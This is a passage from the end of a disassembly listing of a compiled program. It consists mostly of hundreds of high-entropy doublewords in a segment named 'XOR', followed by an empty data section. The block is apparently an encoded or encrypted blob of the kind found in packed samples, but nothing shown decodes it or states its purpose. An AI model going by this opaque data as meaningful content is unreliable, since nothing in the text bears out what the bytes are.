dd 0ED2E0EB3h, 0B0159614h, 25CF634Ah, 0ED4752F7h, 3A408488h
dd 4BD1EC8Eh, 92EB9A39h, 0B9581AEEh, 0A4096EA1h, 1075DA44h
dd 0AB358434h, 5DC275C1h, 5479164Dh, 0DCB231C1h, 0AF913630h
dd 1CF0E9CFh, 469CEEAh, 8923B718h, 0DCA7A64Bh, 0BC1A59A9h
dd 39193ED8h, 8401E10Fh, 67F156BBh, 628D72E7h, 65AF7E92h
dd 0D0359AD7h, 0B1F434ABh, 0A8CD7F83h, 13AC96C2h, 80E23033h
dd 22CE3F1Bh, 0E5BD6250h, 84626880h, 12226F5Fh, 4D0126E4h
dd 0D86DAC65h, 6955CB5Eh, 0F8C4AA4Fh, 482D1D16h, 221D82ECh
dd 7A36E553h, 6FF59AE8h, 3C6E46A0h, 2715B597h, 0D8661A0Eh
dd 0C51E0A6Fh, 0ACD14F81h, 5B7C9B16h, 5E3A1E04h, 85388B23h
dd 5C013FBDh, 0BD8DFFC2h, 7416FEA3h, 0A4D6E6CAh, 4540D63Bh
dd 0B1EFBF20h, 351AAED3h, 50B87250h, 8BD186F6h, 689A92CCh
dd 9339DBC3h, 6144B3h, 7E4EBF9Bh, 1B3DE2D0h, 4412532Bh
dd 0C84CF5DFh, 3092631Eh, 88ED52F7h, 0FA86CE23h, 50DAA78Eh
dd 0FE00963Bh, 29284366h, 29924F46h, 10350325h, 7CFD6143h
dd 0E4042D17h, 645E9B82h, 72148AAFh, 0BD9CB75Ah, 1D7603DAh
dd 4A907A5h, 3B80315Eh, 0F120FF0Dh, 5795C5F4h, 0B7254156h
dd 619CA31Fh, 0DA159A3h, 616869EDh, 71B5277Dh, 0D129047Eh
dd 7728E639h, 0BCCBEDE3h, 91892042h, 17088273h, 0B7929954h
dd 18863C0Ch, 98B0D1F3h, 70C40A83h, 9C99E856h, 932CD237h
dd 0F1E0696Eh, 0A02D607Ch, 7B382A7Bh, 0F471BBB6h, 50836034h
dd 0BCF3C9A5h, 2875704Bh, 56D1066Bh, 0D42D73B7h, 9C4A224h
dd 0F1E67762h, 0C7D1FEFh, 473883BAh, 7548BA6Dh, 0AB947D9Ah
dd 9F32956Eh, 33D8C4ACh, 0BFA84853h, 0CF9CABD6h, 0FCD0F8DCh
dd 0D3BCA52Ah, 637469ACh, 0AC9D8DF9h, 25D0B9A2h, 0D3C5B193h
dd 9F62462Ah, 17A0CDB6h, 573F771Fh, 0AC25156Eh, 0C3F8E1C9h
dd 1C6B4EF9h, 37C552B7h, 0C0CF5DEh, 60C52A8Fh, 46D61738h
dd 219DC242h, 0A4097110h, 9BA3C123h, 0BCFA9840h, 0CAC60E17h
dd 91AB9F25h, 0A6A281B5h, 0A791F65Ah, 0F6FC2671h, 0D4A04F95h
dd 665231E4h, 3341A60Ah, 28AD00B6h, 391C7EE3h, 2085ED48h
dd 8E25194Dh, 73D789Eh, 64C72217h, 51297DFFh, 3CA207C4h
dd 568769D7h, 0AC79DE41h, 1F08F0ECh, 0EE703826h, 22342287h
dd 0C06F9103h, 3195FA07h, 0FAE917CBh, 0F830190Dh, 34C52538h
dd 0B0251B0Fh, 0C7DE6D0h, 0B6FD1CE7h, 3881469Ch, 6F4B2617h
dd 0FB8F4386h, 0AFCF40Bh, 0C82A2BF4h, 0E5BC0A2Fh, 0AC117483h
dd 1E150B47h, 4CE94EB3h, 4F2B66F7h, 753EB066h, 4E2D520Bh
dd 2882E8E7h, 257D6A0Fh, 0CB1A224h, 0FD686245h, 0E409DA44h
dd 50B51A77h, 49A18FC0h, 284DFE6Eh, 4B368AC4h, 4051BBB4h
dd 6CD1399Bh, 5824AE08h, 4D53730h, 408177DFh, 30A77BCBh
dd 3CEA52F7h, 0CFCE3E86h, 65C5EA83h, 51BC0C0Fh, 38DDCE38h
dd 24096ED3h, 0ADF5D333h, 7CA152D4h, 6BC60115h, 94B284E8h
dd 4F3D8AEFh, 0C4A48D6Fh, 1700E707h, 467EB1Bh, 465AB59Fh
dd 34416624h, 87705621h, 0B620FAEEh, 75FCEA4Fh, 8C312FC9h
dd 0FB21689Eh, 511C16EDh, 5228816Ah, 3CA107C0h, 0C829AC58h
dd 8F99DE43h, 83AF9CD9h, 0F650A2B1h, 893AB177h, 0C4294E27h
dd 5A5FA5Fh, 0A88EEBD5h, 936D924Bh, 34E9E330h, 97A1DD0Fh
dd 4CBA1DD4h, 0B86AF7E7h, 17892E63h, 73F50B64h, 0D3FD9929h
dd 0A8D9431Ch, 0D4399E03h, 0A821017Fh, 3B1176DBh, 795BAD6h
dd 0FFDCC5A4h, 0B07E58B4h, 5B6FA38Bh, 0C82D047Bh, 0E6068963h
dd 2B052AB8h, 0C6F2C681h, 78DDE28Bh, 0DC0FD973h, 19E41C6Eh
dd 0C70DD8EAh, 687D47D4h, 0B17EE9C3h, 12650A3Fh, 50A5C14Dh
dd 0E8D2FF86h, 0C7A90EB3h, 0B0154F82h, 0E608E64Bh, 902353AFh
dd 2BD4ED22h, 393FA706h, 51BC963Bh, 38DDCE38h, 0A4096E93h
dd 8E0DC33h, 95E598AAh, 56DA2B27h, 0CFB95E7Ch, 9026629Eh
dd 62736Eh, 98BD6287h, 6D5CE33h, 0D8264292h, 2B14FA9Fh
dd 4BA16DA0h, 66006612h, 33CFBB4Bh, 92A0D1Fh, 3829867Ch
dd 0B3652193h, 426691C9h, 3DCF85F8h, 3D1372D7h, 1439CA2Eh
dd 327E4864h, 0DE1DE4B3h, 0C0C052FFh, 331CE5BFh, 3CCB75A5h
dd 0F3F130CAh, 0C879E3BCh, 74D93EA3h, 0E6861F1Fh, 0C93A0990h
dd 0B85D4B41h, 346E6B52h, 37745A7Fh, 0FC61C618h, 508C4D97h
dd 0BDEB0B3Eh, 0C71E0A2Fh, 0AC117689h, 8F5D20C2h, 44157F38h
dd 0F055BA1Fh, 0EBCF20Bh, 7F6B1CFh, 0B120D81Eh, 0A0455329h
dd 0C7FAD9DAh, 8813BD7Fh, 0D332B9Ah, 9ADE1A3Fh, 3520D9F3h
dd 6A8EEA0Dh, 0DC98E1D3h, 1AE2452Fh, 84D17674h, 0D83D7ED3h
dd 0DB1D074h, 3A653DE0h, 0DC8D0DC0h, 796AA1B7h, 0F4597E17h
dd 0F4D52A8Fh, 69B699FDh, 0EE9DC257h, 0D5865DD3h, 10751A73h
dd 0D1E148ABh, 9F87780Bh, 94A50F08h, 0C4258AEFh, 0A68B035Bh
dd 58C9321Ch, 35E63D33h, 70D5FAD3h, 0B141A64Bh, 4AA88C6Eh
dd 0A17E8A1h, 291C19EDh, 0CEBF5541h, 0DA07C47Dh, 0C8176106h
dd 5F11BC76h, 0C9203E69h, 0A8CD7B89h, 8CF5E543h, 1F08F1D6h
dd 2C2AC870h, 9C2AA987h, 33294E28h, 0F0BED014h, 0A86EBDCBh
dd 956D924Ch, 34D21830h, 82D21F0Fh, 0FDB1D654h, 0B71D1C15h
dd 64C23C08h, 288241BFh, 0CB610640h, 0A8D6602Ch, 0C0C65503h
dd 0CDA54A64h, 0ECE9BC30h, 0EACA6947h, 5AE90EECh, 501470Ah
dd 14026CBh, 0C86D9B29h, 34414163h, 5D056ACFh, 29F2D761h
dd 781D15E0h, 0A54C9EEBh, 90C29A04h, 7F6103EBh, 0D8D0AAD6h
dd 14761FCEh, 0C3650A44h, 46D12678h, 0BE21AF07h, 40C502F4h
dd 0A3826B3Bh, 6B3D4EABh, 8D3A9982h, 231074CBh, 7F93423Ah
dd 0AA52AD96h, 8EA5D7F2h, 0C9C18007h, 7075DA3Fh, 4B34E313h
dd 7356FF62h, 0D1A9FA47h, 0DC064h, 2441815Bh, 9EC3E369h
dd 0DA86C131h, 0CFD53AF7h, 0B6FD310Bh, 87DDC477h, 7406B678h
dd 28416D4Fh, 5B252C3Ch, 0FB6A66F2h, 3CC5EC12h, 0AF988516h
dd 0BF45DD3h, 204CD322h, 1479DEF7h, 6F4DBBC6h, 8451B61Bh
dd 58BD2277h, 6C29AEB1h, 3095FA8Fh, 9C0169B3h, 8891437h
dd 70B50A30h, 0F8C480CCh, 0ECAAAA7Bh, 0B81D827Fh, 48557953h
dd 8A6C9FEFh, 1050ABACh, 61253257h, 0F56C5528h, 41A506ADh
dd 0AE0C74DAh, 0FA6994Ch, 0BBC95A4Eh, 62C7FAAAh, 622Ah
dd 149Ah dup(0)
XOR ends
; Section 5. (virtual address 00012000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00011800
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata2 segment para public 'DATA' use32
assume cs:_idata2
;org 31432000h
dd 80h dup(0)
align 1000h
_idata2 ends
end start